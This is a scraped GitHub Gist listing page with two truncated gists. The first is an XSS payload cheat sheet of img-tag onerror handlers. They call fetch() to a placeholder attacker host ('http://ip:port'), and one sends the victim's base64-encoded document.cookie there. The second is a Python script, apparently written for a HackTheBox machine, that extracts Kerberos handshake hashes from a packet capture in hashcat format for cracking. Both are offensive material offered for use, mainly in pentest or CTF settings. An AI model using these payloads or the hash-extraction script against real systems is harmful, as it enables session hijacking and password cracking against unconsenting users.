This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Test For Image | |
| <img src='http://ip:port/xss' /> | |
| // Test For Fetch | |
| <img src=x onerror=fetch('http://ip:port/xss2') /> | |
| // Fetch Cookie Stealing | |
| <img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) /> | |
| // Fetch entire page contents |
Reelix
/ find-kerb.py
Last active
April 10, 2024 14:17
Find a kerberos handshake hash in a .pcap file in hashcat format
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import pyshark | |
| from pprint import pprint | |
| data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos") | |
| print("Searching for Kerberos packets...") | |
| for pkt in data: | |
| if "Kerberos" in pkt: | |
| dirs = dir(pkt["Kerberos"]) | |
| if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs): |
OlderNewer